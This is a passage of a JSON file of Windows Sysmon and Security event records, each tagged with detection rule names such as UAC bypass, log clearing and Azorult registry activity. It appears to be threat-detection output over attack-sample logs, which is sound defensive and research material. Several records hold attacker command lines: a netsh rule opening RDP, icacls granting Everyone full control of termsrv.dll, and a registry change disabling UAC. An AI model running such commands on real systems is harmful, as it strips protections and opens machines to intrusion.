Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-02-10 08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":18769,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3888}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:13.147582Z"}},"Version":3}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":772605,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":5816}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-23T16:49:41.578692Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"3B","SubjectLogonId":"0x7b186","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-500"}}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-27 10:15:20.376","Image":"c:\\Users\\bouss\\Downloads\\ProcessHerpaderping.exe","ProcessGuid":"00247C92-F3AE-5F97-0000-00106ABA0418","ProcessId":21756,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\samir.exe","UtcTime":"2020-10-27 10:17:18.369"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2246491,"Execution":{"#attributes":{"ProcessID":5400,"ThreadID":6548}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-27T10:17:18.369342Z"}},"Version":2}}}},{"detection":["In-memory PowerShell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"System.Management.Automation","FileVersion":"6.1.7601.17514","Hashes":"SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000","Image":"C:\\Windows\\System32\\notepad.exe","ImageLoaded":"C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4b93b6bd71723bed2fa9dd778436dd5e\\System.Management.Automation.ni.dll","ProcessGuid":"365ABB72-3D1B-5CE0-0000-0010C3840B00","ProcessId":2840,"Product":"Microsoft (R) Windows (R) Operating System","RuleName":"Defense Evasion - Unmanaged PowerShell Detected","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-05-18 17:16:18.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":18732,"Execution":{"#attributes":{"ProcessID":1940,"ThreadID":2004}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-18T17:16:18.833171Z"}},"Version":3}}}},{"detection":["(Built-in Logic) - New User Created"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107103","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769629,"Execution":{"#attributes":{"ProcessID":584,"ThreadID":752}},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider":{"#attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"}},"Security":null,"Task":13824,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-16T09:31:19.133272Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - New User Created"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107104","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769634,"Execution":{"#attributes":{"ProcessID":584,"ThreadID":640}},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider":{"#attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"}},"Security":null,"Task":13824,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-16T09:32:13.647155Z"}},"Version":0}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.526","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\install.bat","UtcTime":"2019-03-17 20:17:44.526"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5252,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:44.537011Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.607","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPCheck.exe","UtcTime":"2019-03-17 20:17:44.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5253,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:44.637155Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.777","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPConf.exe","UtcTime":"2019-03-17 20:17:44.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5254,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:44.797385Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.458","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPWInst.exe","UtcTime":"2019-03-17 20:17:45.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5255,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:45.478364Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.618","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\uninstall.bat","UtcTime":"2019-03-17 20:17:45.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5256,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:45.628580Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.648","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\update.bat","UtcTime":"2019-03-17 20:17:45.648"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5257,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:45.648609Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware","RDP Sensitive Settings Changed"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"%%ProgramFiles%%\\RDP Wrapper\\rdpwrap.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\ServiceDll","UtcTime":"2019-03-17 20:18:05.086"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5265,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:18:05.086560Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware","RDP Registry Modification","RDP Sensitive Settings Changed"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5267,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5269,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"}},"Version":2}}}},{"detection":["Netsh Port or Application Allowed","Netsh RDP Port Opening"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in protocol=tcp localport=3389 profile=any action=allow","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=784A50A6A09C25F011C3143DDD68E729,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst\" -i -o","ParentImage":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ParentProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ParentProcessId":3700,"ProcessGuid":"365ABB72-AB81-5C8E-0000-001024960C00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5270,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:18:09.312636Z"}},"Version":5}}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant %%username%%:F","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010296C0D00","ProcessId":3536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.897"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5312,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:20:17.917561Z"}},"Version":5}}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant *S-1-1-0:(F)","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010656E0D00","ProcessId":3652,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5313,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:20:17.927576Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000050)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"365ABB72-AC79-5C8E-0000-0010E1B50D00","ProcessId":2872,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber","UtcTime":"2019-03-17 20:22:59.399"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5329,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:22:59.399761Z"}},"Version":2}}}},{"detection":["(Built-in Logic) - System log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"System","Computer":"PC01.example.corp","Correlation":null,"EventID":104,"EventRecordID":27736,"Execution":{"#attributes":{"ProcessID":812,"ThreadID":3916}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":{"#attributes":{"UserID":"S-1-5-21-1587066498-1489273250-1035260531-1106"}},"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T23:34:25.894341Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"BackupPath":"","Channel":"System","SubjectDomainName":"EXAMPLE","SubjectUserName":"user01"}}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-30 10:12:45.583","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-1EFA-5CC8-0000-0010D3DE1C00","ProcessId":3292,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\bs.ps1","UtcTime":"2019-04-30 10:12:45.583"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":8930,"Execution":{"#attributes":{"ProcessID":1956,"ThreadID":1636}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T10:12:45.583363Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"DFAE8213-70EB-5CDD-0000-0010F66D0A00","ProcessId":3788,"RuleName":"technique_id=T1088,technique_name=Bypass User Account Control","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\EnableLUA","UtcTime":"2019-05-16 14:17:15.758"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":13,"EventRecordID":18619,"Execution":{"#attributes":{"ProcessID":1780,"ThreadID":2204}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-16T14:17:15.763712Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Office Security Settings Changed"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","ProcessGuid":"365ABB72-92DF-5CDB-0000-0010A15E1300","ProcessId":3804,"RuleName":"Defense Evasion - access to the VBA project object model in the Macro Settings changed","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\AccessVBOM","UtcTime":"2019-05-15 